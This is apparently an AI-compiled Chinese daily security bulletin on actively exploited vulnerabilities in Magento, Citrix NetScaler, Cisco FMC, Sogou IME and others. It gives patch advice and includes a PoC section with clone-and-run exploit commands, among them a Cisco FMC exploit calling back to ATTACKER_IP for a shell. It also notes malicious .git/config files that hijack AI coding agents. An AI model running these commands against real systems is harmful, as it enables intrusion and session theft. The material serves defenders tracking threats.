每日安全情报报告 · 2026-09-14

由 AI 整理发布

覆盖范围:2026-09-12 至 2026-09-14(优先收录近 24–48 小时新增/在野利用漏洞,并保留仍处处置窗口的在野存量)
风险等级图例:【严重】(CVSS 9.0–10.0) | 【高危】(CVSS 7.0–8.9) | 【中危】(CVSS 4.0–6.9)
标记说明:在野利用 = 已确认被真实攻击使用(CISA KEV / 厂商/威胁情报证实)


一、最新高危漏洞

1. CVE-2026-84869 — ConnectWise ScreenConnect 客户端会话内任意文件执行【严重 · 在野利用】

  • 漏洞编号:CVE-2026-84869
  • 漏洞类型:权限管理缺陷 / 授权缺失(CWE-269/862),活跃远程会话内文件传输可绕过 Host 端确认直接执行
  • 受影响组件:ConnectWise ScreenConnect 客户端(< 26.6.5);服务器不受影响,受打的是装在终端上的客户端
  • CVSS 评分9.9(Critical)
  • 利用状态:CISA 于 2026-09-12(网传 09-10/11 批次)将其与 JFrog、MikroTik 共五漏洞一并纳入 KEV,联邦截止 09-14(今日)。Huntress 已记录 3 起事件:攻击者借被控 ScreenConnect 客户端推送恶意 VBScript 载荷,并呈蠕虫式向新连接终端扩散。连接一台被感染机器的运维自身也会中招。
  • 修复版本:升级客户端至 26.6.5;临时缓解:进入 Administration → Security → Roles,逐项取消 TransferFiles 权限(不能替代升级)。
  • 参考链接NVD 详情CISA KEV 目录ThreatAft 技术分析The Hacker News KEV 报道

2. CVE-2026-75650 — Adobe Commerce / Magento "StyleSmuggler" 未授权 RCE【严重 · 在野利用】

  • 漏洞编号:CVE-2026-75650(Adobe 公告 APSB26-146,热补丁 VULN-39341;代号 StyleSmuggler)
  • 漏洞类型:模板引擎特殊元素中和不当(CWE-1336)→ 未认证远程代码执行(对象注入 + 文件包含)
  • 受影响组件:Adobe Commerce 2.4.4–2.4.9(-2026-aug 及更早全系)、Adobe Commerce B2B 1.3.3–1.5.3、Magento Open Source 2.4.6–2.4.9;即已打 2026-08 月度补丁仍受影响
  • CVSS 评分10.0(Adobe 官方,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)/ NVD 口径 9.8
  • 利用状态:Sansec 命名 StyleSmuggler,自 2026-09-04 起确认在野利用,9-7 Adobe 才发最高优先级热补丁(间隔 3 天)。攻击链:畸形输入"投毒"进日志/错误报告 → 触发"支付交易失败提醒"邮件 → 模板过滤器的对象注入链驱动 DI 组件包含执行污染文件 → RCE。后置载荷为 Rust Linux 后门(伪装 fc-cache/chronyd,C2 伪造成 NTP UDP/123 流量)或 PHP WebShell。CISA 已于 09-08 纳入 KEV(截止 09-11,且要求强制取证)。
  • 修复版本:应用 Adobe 官方热补丁 VULN-39341(composer 补丁),且必须轮换加密主密钥及所有凭据(Adobe 强制要求);2.4.0–2.4.3 等 EOL 版本用 Scandiweb 回移补丁(未经 Adobe 验证,需 staging 验证)。
  • 参考链接Adobe 安全公告 APSB26-146NVD 详情Shield53 技术分析CISA KEV 目录

3. CVE-2026-67277 / CVE-2026-86060 — MikroTik RouterOS "MikroTrick" 未认证接管【严重 · 在野利用】

  • 漏洞编号:CVE-2026-67277(关键功能缺失认证)+ CVE-2026-86060(命令参数分隔符未中性化)
  • 漏洞类型:Missing Authentication for Critical Function(CWE-306)/ Improper Neutralization of Argument Delimiters(CWE-88)
  • 受影响组件:MikroTik RouterOS(经互联网暴露的 SSH 管理接口)
  • CVSS 评分:CISA 均标记 Critical(各来源口径约 CVSS 8.8 / 9.8,关联利用链名 "MikroTrick")
  • 利用状态:CERT Polska 记录攻击者自 2026-09-02 起经暴露 SSH 无认证接管路由器;CISA 于 09-10 纳入 KEV,RouterOS 联邦截止 09-13(昨日到期)。两漏洞链式可实现完全管理员接管。
  • 修复版本:升级至 MikroTik 官方修复版 RouterOS,并核查部署后是否存在未授权配置变更。
  • 参考链接NVD 详情 CVE-2026-67277NVD 详情 CVE-2026-86060CyberRecaps 9/13 KEV 报道CISA KEV 目录

4. CVE-2026-42016 / CVE-2026-42018 — JFrog Artifactory 链式提权(与 CVE-2026-82329 组合)【高危 · 在野利用】

  • 漏洞编号:CVE-2026-42016(CVSS 8.1,令牌作用域被忽略的错误授权)+ CVE-2026-42018(CVSS 7.5,匿名令牌泄漏)+ 既有 CVE-2026-82329(CVSS 9.8,不当认证)
  • 漏洞类型:Incorrect Authorization / Improper Authentication → 链式获取管理员控制权
  • 受影响组件:自托管 JFrog Artifactory(< 7.133.11)
  • CVSS 评分:8.1 + 7.5 + 9.8
  • 利用状态:CISA 09-12 将 JFrog 两漏洞纳入 KEV(联邦截止 09-25)。攻击者将 CVE-2026-42016/42018 与 CVE-2026-82329 链式利用,夺取自托管实例管理员权限、创建持久账户、部署 Groovy 插件并安装 Rust 后门。Artifactory 沦陷意味着软件供应链投毒风险。
  • 修复版本:升级至 7.133.11 或更高;轮换令牌、审计管理员账户、排查异常 Groovy 插件与出站连接。
  • 参考链接NVD 详情 CVE-2026-42016NVD 详情 CVE-2026-42018NVD 详情 CVE-2026-82329NetSecOps KEV 报道

5. CVE-2026-19490 — Citrix NetScaler ADC/Gateway SAML 认证绕过(会话伪造)【严重 · 在野利用】

  • 漏洞编号:CVE-2026-19490(关联 CVE-2026-19489,CVSS 8.8 内存溢出)
  • 漏洞类型:认证绕过(CWE-288,备用路径)→ 未签名 SAML 断言被接受,伪造有效会话
  • 受影响组件:NetScaler ADC / Gateway 14.1 < 14.1-73.32、13.1 < 13.1-63.21(及对应 FIPS/NDcPP),配置为 Gateway(SSL VPN/ICA Proxy/CVPN/RDP Proxy)或 AAA vserver 且绑定 SAML action
  • CVSS 评分9.3(CVSS v4.0 Critical)
  • 利用状态:Citrix 公告 CTX696939(2026-08-19)。CISA 于 09-09 纳入 KEV(联邦截止 09-12);公开 PoC 出现后,自 2026-09-04 起确认遭在野利用(无认证、无交互、低复杂度)。根因:nsppe 引擎在 SAML HTTP-Redirect binding 路径以 strict=0 调用解析器,且未签名断言门控将默认配置字(rejectUnsignedAssertion=ON)误判为"允许"。
  • 修复版本:升级至 14.1-73.32 / 13.1-63.21(或对应 FIPS/NDcPP 修复版);无官方 workaround。
  • 参考链接Citrix 安全公告 CTX696939NVD 详情AiCybr KEV 与修复构建CISA KEV 目录

6. CVE-2026-85880 / CVE-2026-81963 — 微软 9 月补丁日两枚在野零日提权【高危 · 在野利用】

  • 漏洞编号:CVE-2026-85880(Windows ALPC 堆溢出)+ CVE-2026-81963(Windows Update Stack 链接解析不当)
  • 漏洞类型:本地权限提升(低权限/沙箱 → SYSTEM);CWE-122 / CWE-59
  • 受影响组件:Windows 10/11 各版本、Windows Server 2012–2025(CVE-2026-85880 覆盖 10/2012–2022;CVE-2026-81963 覆盖 11 23H2+ 与 Server 2025)
  • CVSS 评分:均 7.8(High)
  • 利用状态:微软 2026-09-08 创纪录补丁日一次性修复 974 个 CVE(113+ 严重、约 20 个蠕虫型)。两枚零日均已被实战利用,CISA 于 09-08 纳入 KEV,联邦截止 09-22。CVE-2026-85880 可由低权限 AppContainer 逃逸沙箱提权至 SYSTEM(Volexity/Proofpoint 回报);CVE-2026-81963 为 2022 年以来首个被实战利用的 Windows Update Stack 提权。同时重点关注同批蠕虫型 DNS 服务 RCE CVE-2026-69730(9.8) 与远程桌面服务 RCE CVE-2026-69525(9.8)
  • 修复版本:安装 2026-09 累积更新(按域控 → 互联网可达服务器 Exchange/SharePoint → 成员服务器推进)。
  • 参考链接MSRC CVE-2026-85880MSRC CVE-2026-81963The CyberSignal 补丁日全景CISA KEV 目录

7. CVE-2026-51990 — 腾讯搜狗输入法一键 RCE → GrayRabbit 后门【严重 · 在野利用】

  • 漏洞编号:CVE-2026-51990
  • 漏洞类型:自定义 sgbiz: 协议处理程序参数未校验 + 内嵌 Chromium 80 引擎沙箱关闭/同源策略禁用 → 单次点击远程代码执行
  • 受影响组件:Windows 版搜狗输入法(< 16.3.0.3498);利用链借 CVE-2021-38003(陈旧 V8 漏洞,因引擎停留在 Chromium 80 仍未修复)
  • CVSS 评分:严重级(具体 CVSS 厂商未单独公布;Gen Digital 评级 Critical)
  • 利用状态:中国关联 APT UNC3569 利用该漏洞经一次点击部署 GRAYRABBIT 后门(远程命令 Shell、双向文件传输、反射加载模块,C2 走 443 端口 RC4 混淆原始 TCP)。公开 PoC 已于 2026-09-11 出现在 GitHub,BleepingComputer 于 09-13 确认仍在野利用。腾讯 04-21 推送 16.3.0.3498 修复(仅封堵入口,内嵌浏览器仍无沙箱,存在残余风险)。
  • 修复版本:升级搜狗输入法至 16.3.0.3498 或更高;高安全终端建议用组策略限制 biz_helper.exe 执行。
  • 参考链接ThreatCluster UNC3569 分析BugsToday 攻击链剖析NVD 详情

8. 其他在野存量速览(仍处处置窗口,持续利用中)

漏洞编号类型受影响组件CVSS在野状态
CVE-2025-25249FortiOS 堆溢出 RCE(PivotC2 RAT)Fortinet FortiOS/FortiSwitchManager/FortiSASE7.3KEV 09-09,截止 09-12
CVE-2026-20079Cisco FMC 认证绕过→root(Qilin 勒索)Cisco Secure FMC10.0KEV 09-09,截止 09-12
CVE-2026-85706GitLab 路径遍历任意文件读GitLab CE/EE10.0KEV 09-11,截止 09-14(今日)
CVE-2026-87491Chrome V8 越界写Google Chromium8.8KEV 09-09
CVE-2026-81578/82078PaperCut 认证绕过+动态类加载 RCE(AI Agent 规模化利用)PaperCut NG/MF9.8/9.1在野

二、最新漏洞 PoC(含复现步骤)

说明:以下 PoC 均为近期公开仓库,仅供授权安全研究与渗透测试使用。请严格遵守法律与授权边界;对企业资产务必在授权范围内操作。

1. CVE-2026-75650 — Adobe Commerce/Magento "StyleSmuggler"【在野 · 有公开 PoC】

  • 公开 PoCfortbridge/StyleSmuggler(HTTP 版未认证复现,Python 标准库即可)dinosn 版 PoC(Sploitus)
  • 复现步骤(需先自建 Magento Open Source 2.4.9 实验室):
    bash git clone https://github.com/fortbridge/StyleSmuggler.git cd StyleSmuggler # 对本地实验室发起未认证序列:投毒错误报告 → 触发支付失败邮件渲染 → RCE python3 exploit.py --target http://localhost:18082 # 输出需包含 "RCE VERIFIED" 与当次运行生成的 canary 标记方为成功
  • 前置条件:仅限自有/授权实验室;真实安装请用只读校验器或 disposable staging 克隆验证,切勿将探针置于生产 web 根目录。

2. CVE-2026-19490 — Citrix NetScaler SAML 认证绕过(会话伪造)【在野 · 有公开 PoC】

  • 公开 PoCTarPeg007/CVE-2026-19490(836 行单文件 Python,含 Docker 实验室)
  • 复现步骤
    bash git clone https://github.com/TarPeg007/CVE-2026-19490.git cd CVE-2026-19490 # ① 非侵入配置探针:发送错误 issuer 的未签名断言 # 返回 "Malformed Assertion" → 非易感(STRICT);返回 issuer/policy 错误 → 默认配置易感 python3 poc.py https://vpn.target.com --check-only python3 poc.py https://vpn.target.com --safe-oracle # ② 完整利用(仅限授权目标):伪造指定 NameID 的会话 python3 poc.py https://vpn.target.com --mint --name-id someone@target.example
  • 前置条件:目标需配置为 Gateway/AAA vserver 且绑定 SAML action;成功判据为 302 跳转 /vpn/NSC_AAAC/NSC_TASS 为真实会话 cookie(注意区分删除标记 cookie)。

3. CVE-2026-20079 — Cisco Secure FMC 认证绕过 → Root RCE【在野 · 有公开 PoC】

  • 公开 PoCCyberAuth/CVE-2026-20079(Python 复现,含指纹/检查/利用/验证/清理模式)
  • 复现步骤
    bash git clone https://github.com/CyberAuth/CVE-2026-20079.git cd CVE-2026-20079 python3 -m venv .venv && source .venv/bin/activate # Windows: .venv\Scripts\activate python3 -m pip install -r requirements.txt python3 CVE-2026-20079.py --target https://TARGET --check # 仅指纹/检查(无危害) python3 CVE-2026-20079.py --target https://TARGET --exploit \ --callback-host ATTACKER_IP --callback-port 4444 --auto-verify # 利用
  • 前置条件:目标为受影响 Cisco Secure FMC 版本且存在 boot 阶段创建的 csm_processes 会话;目标需有 nc/netcat/ncat 且可 outbound 至 callback 地址。

4. CVE-2026-51990 — 搜狗输入法 "sgbiz:" 一键 RCE(公开 PoC 已现)【在野 · 有公开 PoC】

  • 公开 PoC:公开利用代码已于 2026-09-11 出现在 GitHub(ThreatCluster 攻击链分析 含完整链与 IOC);本项重点给出排查而非武器化复现。
  • 攻击链(单次点击)
    受害者点击恶意 sgbiz: 链接 → Windows 调起 biz_helper.exe(未校验参数) → 启动 SGMyInput.exe 打开"皮肤商店"并加载攻击者控制的 URL → 内嵌 Chromium 80(无沙箱、关同源策略)触发 CVE-2021-38003 → 代码执行 → 7-Zip DLL 侧加载 → 落地 GRAYRABBIT 后门
  • 授权排查命令(端点侧只读检测):
    bash # ① 监控 7z.exe 从非标准目录加载 7z.dll # (如 C:\Users\Public\Documents 下出现 7z.exe / 7z.dll / 名为 p 的文件 → 高度可疑) # ② 排查 NTFS 备用数据流(ADS)写入 streams.exe -s C:\Users\Public\Documents # ③ 网络侧:443 端口非 TLS(无 TLS ClientHello)出向流量 # 及对 mail.uaiubifas[.]top、noht1ng[.]top 的 DNS 解析回溯
  • 前置条件:目标为未升级(< 16.3.0.3498)的 Windows 版搜狗输入法;补丁仅封堵入口,内嵌浏览器仍无沙箱,需结合行为监控。

5. CVE-2026-85706 — GitLab 路径遍历(暂无武器化 PoC,附检测命令)【在野 · 仅检测】

  • 截至本报告发布,GitLab 路径遍历(CVE-2026-85706)尚无公开武器化 PoC;watchTowr 已观测到活跃探测。建议以升级 + 日志排查为主:
    bash grep -R "repository/commits" /var/log/gitlab/ \ | grep -E '\.\./|/etc/|/proc/|passwd|gitlab\.rb' # 命中即疑似利用尝试
  • 参考:NVD 详情CISA KEV

三、网络安全最新文章(标题 · 摘要 · 链接)

  1. CISA Adds Artifactory, ScreenConnect & RouterOS Flaws to KEV — Daily Cybersecurity News (Sep 13) — CyberRecaps(2026-09-13)。汇总 CISA 09-12 五漏洞 KEV 批次(JFrog CVE-2026-42016/42018、ScreenConnect CVE-2026-84869、MikroTik CVE-2026-67277/86060)的利用现状与修复期限,并提示荷兰 NCSC 警告 Check Point VPN 两漏洞(CVE-2026-85102/85103)利用"迫在眉睫"。

  2. Five Flaws Added to KEV in One Entry (09/13/2026) — The Axe Report(2026-09-13)。解读本批 KEV 的共性信号:制品仓库、远程支持工具、路由器操作系统均处于"他人工作之下"的基础设施层;另述微软披露的 passkey 主题钓鱼云账户接管与 Sogou CVE-2026-51990(GrayRabbit)活动。

  3. Microsoft September 2026 Patch Tuesday: Record 974 CVEs, Two Zero-Days — The CyberSignal(2026-09-08 持续更新)。剖析创纪录单月补丁日,聚焦两枚在野零日 CVE-2026-85880 / CVE-2026-81963(KEV 截止 09-22),并提示 Defender 对旧零日 ShieldBreak(CVE-2026-69414)的修复已被新 PoC "ShieldCrash" 公开绕过。

  4. ConnectWise ScreenConnect CVE-2026-84869 — CVSS 9.9 RCE, CISA KEV — ThreatAft(2026-09)。详述 ScreenConnect 客户端会话内文件传输绕过授权直接执行的机制、Huntress 观测到的 VBScript 蠕虫式传播,以及临时取消 TransferFiles 权限的缓解措施。

  5. Sogou Input Method Turned One Link Into a Windows Backdoor — BugsToday(2026-09)。拆解 UNC3569 借 sgbiz: 协议 + Chromium 80 无沙箱三处缺陷实现一键 RCE 并落地 GRAYRABBIT 的完整攻击链与反沙箱/ADS 自清除对抗设计。

  6. CVSS 10.0 Magento Zero-Day Actively Exploited: Shield53 Analysis of CVE-2026-75650 — Shield53(2026-09)。分析 StyleSmuggler 的武器化速度(首例确认利用后约 50 分钟即被攻陷)、Rust 后门与 PHP WebShell 特征,以及"即已打 8 月补丁仍受影响"的关键风险点。

  7. 4 AI Security Stories (Sep 13): .git config Exploit in Claude Code/Codex, PaperCut AI-Agent Breach — Pondero(2026-09-13)。报道 Accomplish 披露的恶意 .git/config 可让 Claude Code、OpenAI Codex、Cursor 静默拉取并执行攻击者代码(无需开发者打开文件);以及俄语背景攻击者用数百 AI Agent 规模化攻陷 440 个 PaperCut 实例(395 家组织)。

  8. China-Linked UNC3569 Exploits Sogou Input Method Flaw to Deploy GrayRabbit — ThreatCluster(2026-09-13)。给出 CVE-2026-51990 的时间线、GRAYRABBIT 的 IOC(C2 域名、暂存服务器 IP、DLL/载荷哈希)与"补丁仅封堵入口、内嵌浏览器仍无沙箱"的残余风险评估。

部分内容由 AI 辅助生成

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐